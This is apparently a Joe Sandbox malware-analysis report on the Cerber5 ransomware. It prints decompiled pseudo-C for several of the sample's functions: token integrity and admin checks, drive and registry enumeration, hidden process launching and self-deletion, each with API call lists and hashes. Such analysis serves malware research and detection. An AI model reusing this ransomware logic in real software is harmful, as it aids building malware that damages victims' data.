                                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00406DB1
                                                                                                                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00406E29
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406E32
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00406E3B
                                                                                                                                                                                        • wsprintfA.USER32 ref: 00406EED
                                                                                                                                                                                        • wsprintfA.USER32 ref: 00406F6E
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$CloseCreateHandleView$MappingSizeUnmapwsprintf
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 470291713-0
                                                                                                                                                                                        • Opcode ID: 200d1b3652ecac4f1242c4118547b72299b50a0db2f3aea314e0cfd9dd29a6e9
                                                                                                                                                                                        • Instruction ID: 80c9848988a0ecdc918146eb7a2068c8117d091857d02b7a82775880087cebb1
                                                                                                                                                                                        • Opcode Fuzzy Hash: 200d1b3652ecac4f1242c4118547b72299b50a0db2f3aea314e0cfd9dd29a6e9
                                                                                                                                                                                        • Instruction Fuzzy Hash: 26A1E2B1D00205BFDB20ABA4EC85A6FBBB8EB04319F11457EF506F72D1D6388D598B58
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                        			E004082AB(void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                        				char _v8;
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				struct _SHELLEXECUTEINFOW _v72;
                                                                                                                                                                                        				short _v592;
                                                                                                                                                                                        				short _v1112;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                        				signed int _t42;
                                                                                                                                                                                        				void* _t48;
                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                        				intOrPtr* _t51;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t42 = __edx;
                                                                                                                                                                                        				_t41 = __ecx;
                                                                                                                                                                                        				_t19 = E004031AF(_a4, __eflags, E00405905(0x40d6c0, 0xd, 0x4756bd1a));
                                                                                                                                                                                        				_t49 = _t48 + 0x10;
                                                                                                                                                                                        				_t21 = E00403253(_t19, __eflags) | _t42;
                                                                                                                                                                                        				_t55 = _t21;
                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                        					SHChangeNotify(4, 0x3005, 0x42f840, 0);
                                                                                                                                                                                        					MoveFileExW(0x42f840, 0, 4);
                                                                                                                                                                                        					_push(0x42f840);
                                                                                                                                                                                        					_push(PathFindFileNameW(0x42f840));
                                                                                                                                                                                        					_push(E0040591C(0x40d6d0, 0x55, 0x2e7fd69b));
                                                                                                                                                                                        					_push( &_v8);
                                                                                                                                                                                        					_t21 = E00405B0C(__ebx, _t41, 0, 0x42f840, _t55);
                                                                                                                                                                                        					_t51 = _t49 + 0x1c;
                                                                                                                                                                                        					_t56 = _t21;
                                                                                                                                                                                        					if(_t21 != 0) {
                                                                                                                                                                                        						E00405F6B(_t41, _t56,  &_v12);
                                                                                                                                                                                        						 *_t51 = 0x104;
                                                                                                                                                                                        						GetSystemDirectoryW( &_v592, ??);
                                                                                                                                                                                        						_push( &_v592);
                                                                                                                                                                                        						wsprintfW( &_v1112, E0040591C(0x40d6b4, 0xa, 0x1440d523));
                                                                                                                                                                                        						memset( &(_v72.fMask), 0, 0x38);
                                                                                                                                                                                        						_v72.cbSize = 0x3c;
                                                                                                                                                                                        						_v72.fMask = 0x8600;
                                                                                                                                                                                        						_v72.lpVerb = E0040591C(0x40d6ac, 4, 0x96d648ae);
                                                                                                                                                                                        						_v72.lpFile =  &_v1112;
                                                                                                                                                                                        						_v72.lpParameters = _v8;
                                                                                                                                                                                        						_v72.nShow = 0;
                                                                                                                                                                                        						ShellExecuteExW( &_v72);
                                                                                                                                                                                        						_t21 = E00405463(_v8);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					ExitProcess(0);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t21;
                                                                                                                                                                                        			}


                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SHChangeNotify.SHELL32(00000004,00003005,0042F840,00000000), ref: 004082F2
                                                                                                                                                                                        • MoveFileExW.KERNEL32(0042F840,00000000,00000004,?,?,?,00000000), ref: 004082FC
                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(0042F840,0042F840,?,?,?,00000000), ref: 00408304
                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 004083CD
                                                                                                                                                                                          • Part of subcall function 00405F6B: GetModuleHandleA.KERNEL32(00000000,?,?,00000000,0042F840,0040833D,?,?,?,?,?,?,?,00000000), ref: 00405FA1
                                                                                                                                                                                          • Part of subcall function 00405F6B: GetProcAddress.KERNEL32(00000000), ref: 00405FA8
                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,?), ref: 0040834B
                                                                                                                                                                                        • wsprintfW.USER32 ref: 00408374
                                                                                                                                                                                        • memset.NTDLL ref: 00408381
                                                                                                                                                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 004083C1
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: HeapFree.KERNEL32(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorFileLast$AddressChangeDirectoryExecuteExitFindFreeHandleHeapModuleMoveNameNotifyPathProcProcessShellSystemmemsetwsprintf
                                                                                                                                                                                        • String ID: <
                                                                                                                                                                                        • API String ID: 2654349300-4251816714
                                                                                                                                                                                        • Opcode ID: 5d04195fab23e333e7b57bdfe00b931c9a3ffbb541f513d44f927edc04739a11
                                                                                                                                                                                        • Instruction ID: e81e65f490f2918546cf3dc480cadbfd72196a89e8115570de0b66540c6f6c56
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5d04195fab23e333e7b57bdfe00b931c9a3ffbb541f513d44f927edc04739a11
                                                                                                                                                                                        • Instruction Fuzzy Hash: CF2182B1C40218BBDB10ABA1DD49F9F7BBCEB44715F04047AF608B6181E7785A488F6D
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E0040B53E(void* __ecx) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				WCHAR* _v12;
                                                                                                                                                                                        				short _v212;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                        				WCHAR* _t16;
                                                                                                                                                                                        				WCHAR* _t26;
                                                                                                                                                                                        				WCHAR* _t31;
                                                                                                                                                                                        				WCHAR* _t36;
                                                                                                                                                                                        				WCHAR* _t44;
                                                                                                                                                                                        				WCHAR* _t46;
                                                                                                                                                                                        				WCHAR* _t47;
                                                                                                                                                                                        				WCHAR* _t49;
                                                                                                                                                                                        				WCHAR* _t52;
                                                                                                                                                                                        				WCHAR* _t53;
                                                                                                                                                                                        				WCHAR* _t54;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t11 = E0040591C(0x40d958, 0xb, 0xa0dd64f4);
                                                                                                                                                                                        				_t44 = E0040B08E( &_v12, __ecx, E0040591C(0x40d964, 0x1f, 0xab845937), _t11);
                                                                                                                                                                                        				_v12 = _t44;
                                                                                                                                                                                        				if(_t44 == 0) {
                                                                                                                                                                                        					L7:
                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t16 = StrChrW(_t44, 0x2d);
                                                                                                                                                                                        					_t49 = _t16;
                                                                                                                                                                                        					if(_t49 != 0) {
                                                                                                                                                                                        						StrCpyNW( &_v212, _t44, (_t16 - _t44 >> 1) + 1);
                                                                                                                                                                                        						GetTempPathW(0x104, 0x42fbc8);
                                                                                                                                                                                        						lstrcatW(0x42fbc8,  &_v212);
                                                                                                                                                                                        						_t52 =  &(_t49[1]);
                                                                                                                                                                                        						_t26 = StrChrW(_t52, 0x2d);
                                                                                                                                                                                        						_t46 = _t26;
                                                                                                                                                                                        						if(_t46 != 0) {
                                                                                                                                                                                        							StrCpyNW(0x42fdd0, _t52, (_t26 - _t52 >> 1) + 1);
                                                                                                                                                                                        							_t6 =  &(_t46[1]); // 0x2
                                                                                                                                                                                        							_t53 = _t6;
                                                                                                                                                                                        							_t31 = StrChrW(_t53, 0x2d);
                                                                                                                                                                                        							_t47 = _t31;
                                                                                                                                                                                        							if(_t47 != 0) {
                                                                                                                                                                                        								StrCpyNW(0x42fb00, _t53, (_t31 - _t53 >> 1) + 1);
                                                                                                                                                                                        								_t7 =  &(_t47[1]); // 0x2
                                                                                                                                                                                        								_t54 = _t7;
                                                                                                                                                                                        								_t36 = StrChrW(_t54, 0x2d);
                                                                                                                                                                                        								if(_t36 != 0) {
                                                                                                                                                                                        									StrCpyNW(0x42fe98, _t54, (_t36 - _t54 >> 1) + 1);
                                                                                                                                                                                        									_v5 = 1;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					E00405463(_v12);
                                                                                                                                                                                        					goto L7;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}




















                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040B08E: RegOpenKeyExW.ADVAPI32(80000002,0040B57E,00000000,00020119,0040B57E,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0AE
                                                                                                                                                                                          • Part of subcall function 0040B08E: RegQueryValueExW.ADVAPI32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0C8
                                                                                                                                                                                          • Part of subcall function 0040B08E: RegQueryValueExW.ADVAPI32(0040B57E,?,00000000,00000000,00000000,00000000,?,?,?,?,0040B57E,00000000,?,?,00000000), ref: 0040B0ED
                                                                                                                                                                                          • Part of subcall function 0040B08E: RegCloseKey.ADVAPI32(0040B57E,?,?,?,?,0040B57E,00000000,?,?,00000000,?,?,00000000), ref: 0040B10E
                                                                                                                                                                                        • StrChrW.SHLWAPI(00000000,0000002D,00000000,?,00000000,?,?,00000000), ref: 0040B591
                                                                                                                                                                                        • StrCpyNW.SHLWAPI(?,00000000,00000001,?,00000000,?,?,00000000), ref: 0040B5AF
                                                                                                                                                                                        • GetTempPathW.KERNEL32(00000104,0042FBC8,?,00000000,?,?,00000000), ref: 0040B5C0
                                                                                                                                                                                        • lstrcatW.KERNEL32(0042FBC8,?), ref: 0040B5CE
                                                                                                                                                                                        • StrChrW.SHLWAPI(-00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B5DA
                                                                                                                                                                                        • StrCpyNW.SHLWAPI(0042FDD0,-00000002,00000001,?,00000000,?,?,00000000), ref: 0040B5F2
                                                                                                                                                                                        • StrChrW.SHLWAPI(00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B5FE
                                                                                                                                                                                        • StrCpyNW.SHLWAPI(0042FB00,00000002,00000001,?,00000000,?,?,00000000), ref: 0040B616
                                                                                                                                                                                        • StrChrW.SHLWAPI(00000002,0000002D,?,00000000,?,?,00000000), ref: 0040B622
                                                                                                                                                                                        • StrCpyNW.SHLWAPI(0042FE98,00000002,00000001,?,00000000,?,?,00000000), ref: 0040B638
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: QueryValue$CloseOpenPathTemplstrcat
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3283998727-0
                                                                                                                                                                                        • Opcode ID: 3cd2aa2785f18796cf27a8dfd0db405cd6b0d8585c89bf5c46c041bb4523753b
                                                                                                                                                                                        • Instruction ID: 32be6bc6edbcde913aa383d40c1836da8f2025cb8ba36b10733c938e06cc4411
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3cd2aa2785f18796cf27a8dfd0db405cd6b0d8585c89bf5c46c041bb4523753b
                                                                                                                                                                                        • Instruction Fuzzy Hash: C52126779006227AD32057A49D0EFAF3E68DF84B00F040836F954F22C1EF75DA0586AE
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E00406005(void* __ecx) {
                                                                                                                                                                                        				long _v8;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				long _t30;
                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t30 = 0;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v12) != 0) {
                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                        					if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() == 0x7a) {
                                                                                                                                                                                        						_t33 = LocalAlloc(0x40, _v8);
                                                                                                                                                                                        						if(_t33 != _t30) {
                                                                                                                                                                                        							if(GetTokenInformation(_v12, 0x19, _t33, _v8,  &_v8) != 0) {
                                                                                                                                                                                        								_t30 =  *(GetSidSubAuthority( *_t33,  *(GetSidSubAuthorityCount( *_t33)) - 0x00000001 & 0x000000ff));
                                                                                                                                                                                        							}
                                                                                                                                                                                        							LocalFree(_t33);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					CloseHandle(_v12);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t30;
                                                                                                                                                                                        			}








                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000000,00000000,?,004067F8), ref: 00406016
                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,?,004067F8), ref: 0040601D
                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,004067F8), ref: 00406035
                                                                                                                                                                                        • GetLastError.KERNEL32(?,004067F8), ref: 0040603F
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,?,004067F8), ref: 00406050
                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000019(TokenIntegrityLevel),00000000,?,?,?,004067F8), ref: 00406069
                                                                                                                                                                                        • GetSidSubAuthorityCount.ADVAPI32(00000000,?,004067F8), ref: 00406075
                                                                                                                                                                                        • GetSidSubAuthority.ADVAPI32(00000000,?,?,004067F8), ref: 00406085
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,004067F8), ref: 0040608E
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,004067F8), ref: 00406098
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Token$AuthorityInformationLocalProcess$AllocCloseCountCurrentErrorFreeHandleLastOpen
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2123698122-0
                                                                                                                                                                                        • Opcode ID: 8cdcdb099773aa73dff319db42a612ccbdfaf0fca6c691c724fc3d702d28fb54
                                                                                                                                                                                        • Instruction ID: 8cb5e333a96f95fad98f0925d080cf7ecd4ccd4366d947745b1979e041030130
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8cdcdb099773aa73dff319db42a612ccbdfaf0fca6c691c724fc3d702d28fb54
                                                                                                                                                                                        • Instruction Fuzzy Hash: E911467A600104FFDB219FA1DD08DAE7F79EB45711F1000B9F906F26A0D7359A18EB68
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                        			E0040A8DF(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr* _a8, char _a12) {
                                                                                                                                                                                        				char _v12;
                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                        				char _v24;
                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                        				long _v32;
                                                                                                                                                                                        				intOrPtr _v36;
                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                        				char _v68;
                                                                                                                                                                                        				short _v592;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                        				intOrPtr _t61;
                                                                                                                                                                                        				void* _t77;
                                                                                                                                                                                        				void* _t78;
                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                        				void* _t82;
                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                        				void* _t89;
                                                                                                                                                                                        				long _t90;
                                                                                                                                                                                        				void* _t92;
                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t87 = __edx;
                                                                                                                                                                                        				_t79 = __ecx;
                                                                                                                                                                                        				E00402C20(_t77, __edx, _t88, _t92);
                                                                                                                                                                                        				_t95 = _t94 + 0x14;
                                                                                                                                                                                        				_v32 = GetTickCount();
                                                                                                                                                                                        				 *0x40f1d8( &_v68, _a4, E0040591C(0x40d8b4, 0x13, 0x682561bd));
                                                                                                                                                                                        				_v24 = 0;
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				_v28 = 0;
                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                        				_t78 = E0040622D(_t77, _t79);
                                                                                                                                                                                        				GetSystemDirectoryW( &_v592, 0x104);
                                                                                                                                                                                        				_v36 = E0040A0A4();
                                                                                                                                                                                        				_t89 = 0;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t50 = E0040A892(_v36,  &_v44);
                                                                                                                                                                                        					_pop(_t82);
                                                                                                                                                                                        					if(_t50 >= 2 && (_t50 <= 3 || _t50 == 6)) {
                                                                                                                                                                                        						_t22 =  &_v20; // 0x406633
                                                                                                                                                                                        						E0040A80E(_t82, _t78,  &_v44, _t22,  &_v68,  &_v16,  &_v12,  &_v28,  &_v24, (_v592 & 0xffffff00 | _v592 == _v44) & 0x000000ff);
                                                                                                                                                                                        						_t95 = _t95 + 0x24;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t89 = _t89 + 1;
                                                                                                                                                                                        				} while (_t89 <= 0x19);
                                                                                                                                                                                        				E0040630E(_t78);
                                                                                                                                                                                        				E0040634B(_t78, _t78);
                                                                                                                                                                                        				_t90 = GetTickCount();
                                                                                                                                                                                        				if(E00402C54(_t87, _a4) != 0) {
                                                                                                                                                                                        					_push(_t90 - _v32);
                                                                                                                                                                                        					_push(E0040591C( &E0040D8C8, 0x1f, 0x34d17065));
                                                                                                                                                                                        					_push(_a4);
                                                                                                                                                                                        					E00402C20(_t78, _t87, _t90 - _v32, 0);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(_v20 != 0) {
                                                                                                                                                                                        					_t61 = _v16;
                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                        						 *_v28 = _t61;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						_v12 = _t61;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					 *_a8 = _v12;
                                                                                                                                                                                        					_t35 =  &_a12; // 0x406633
                                                                                                                                                                                        					 *((intOrPtr*)( *_t35)) = _v24;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *0x40f1e0( &_v68);
                                                                                                                                                                                        				return 0 | _v20 != 0x00000000;
                                                                                                                                                                                        			}






























APIs
• GetTickCount.KERNEL32 ref: 0040A908
• RtlInitializeCriticalSection.NTDLL(?), ref: 0040A915
• GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040A93F
  • Part of subcall function 0040A0A4: GetLogicalDrives.KERNEL32 ref: 0040A0AD
  • Part of subcall function 0040A0A4: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,00000000), ref: 0040A0ED
  • Part of subcall function 0040A0A4: RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A123
  • Part of subcall function 0040A0A4: RegCloseKey.ADVAPI32(00000000,?,?,00000000,00000000,00000000,00000000), ref: 0040A138
  • Part of subcall function 0040A892: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040A8D4
• GetTickCount.KERNEL32 ref: 0040A9B9
• RtlDeleteCriticalSection.NTDLL(?), ref: 0040AA1D
Strings
Memory Dump Source
• Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
Yara matches
Similarity
• API ID: CountCriticalSectionTick$CloseDeleteDirectoryDrivesInitializeLogicalOpenQuerySystemValuelstrcpy
• String ID: 0jt$3f@$3f@
• API String ID: 4201821548-612658434
• Opcode ID: b962030eb37cd2a6a6e22f3845ed40c2f4150b5a5231ea02f09655b7e2ab6385
• Instruction ID: 694c260ad55fdb15e18b233715df8a646d2816963bf82ac05ff2a62387601ac6
• Opcode Fuzzy Hash: b962030eb37cd2a6a6e22f3845ed40c2f4150b5a5231ea02f09655b7e2ab6385
• Instruction Fuzzy Hash: 92416FB2D00219ABCB11AFE5DC458EF7BB8EF48310F10443BF501F6281EA388A55CBA5
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 36%
                                                                                                                                                                                        			E00402D06(void* _a4) {
                                                                                                                                                                                        				void _v8;
                                                                                                                                                                                        				long _v12;
                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                        				void _v20;
                                                                                                                                                                                        				char _v88;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				if( *0x43072c < 6) {
                                                                                                                                                                                        					L5:
                                                                                                                                                                                        					if(DuplicateToken(_a4, 1,  &_v8) == 0) {
                                                                                                                                                                                        						L8:
                                                                                                                                                                                        						return 0 | _v16 != 0x00000000;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L6:
                                                                                                                                                                                        					_push( &_v12);
                                                                                                                                                                                        					_push( &_v88);
                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                        					_push(0x1a);
                                                                                                                                                                                        					_v12 = 0x44;
                                                                                                                                                                                        					if( *0x40f93c() != 0) {
                                                                                                                                                                                        						 *0x40faa4(_v8,  &_v88,  &_v16);
                                                                                                                                                                                        						CloseHandle(_v8);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				if(GetTokenInformation(_a4, 0x12,  &_v20, 4,  &_v12) == 0 || _v20 == 3 && GetTokenInformation(_a4, 0x13,  &_v8, 4,  &_v12) == 0) {
                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					if(_v8 != 0) {
                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}









                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000012(TokenIntegrityLevel),?,00000004,?,00000000), ref: 00402D30
                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?), ref: 00402D4F
                                                                                                                                                                                        • DuplicateToken.ADVAPI32(?,00000001,?,00000000), ref: 00402D67
                                                                                                                                                                                        • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 00402D83
                                                                                                                                                                                        • CheckTokenMembership.ADVAPI32(?,?,?), ref: 00402D98
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00402DA1
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000028.00000002.317439336.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000028.00000002.318646464.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000028.00000002.318706779.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_40_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Token$Information$CheckCloseCreateDuplicateHandleKnownMembershipWell
                                                                                                                                                                                        • String ID: D
                                                                                                                                                                                        • API String ID: 476757601-2746444292
                                                                                                                                                                                        • Opcode ID: 25489d45a5b97dd58e497412a4df9039cc6fca1245a2b9d3dca1e17a6d257f24
                                                                                                                                                                                        • Instruction ID: 0d410c75a1abfc5775d22fac195d72f8047e95bba00665c990917ff8bb71829a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 25489d45a5b97dd58e497412a4df9039cc6fca1245a2b9d3dca1e17a6d257f24
                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F21CA71A00218FFEF10DF91CE49AEEBBB8EF04740F004076A601E5190D7789A48DB54
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                                                        			E0040137F(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v24;
                                                                                                                                                                                        				struct _STARTUPINFOA _v92;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(_a4);
                                                                                                                                                                                        				_push(0x42f690);
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				_push(E00405905(0x40ceb4, 0x11, 0x65f84038));
                                                                                                                                                                                        				_push( &_v8);
                                                                                                                                                                                        				E00405B59(__ebx, __ecx, __edi, 0, __eflags);
                                                                                                                                                                                        				memset( &(_v92.lpReserved), 0, 0x40);
                                                                                                                                                                                        				_v92.cb = 0x44;
                                                                                                                                                                                        				if(CreateProcessA(0, _v8, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24) != 0) {
                                                                                                                                                                                        					if(WaitForSingleObject(_v24.hProcess, 0x1388) == 0x102) {
                                                                                                                                                                                        						TerminateProcess(_v24.hProcess, 0);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					CloseHandle(_v24);
                                                                                                                                                                                        					CloseHandle(_v24.hThread);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return E00405463(_v8);
                                                                                                                                                                                        			}









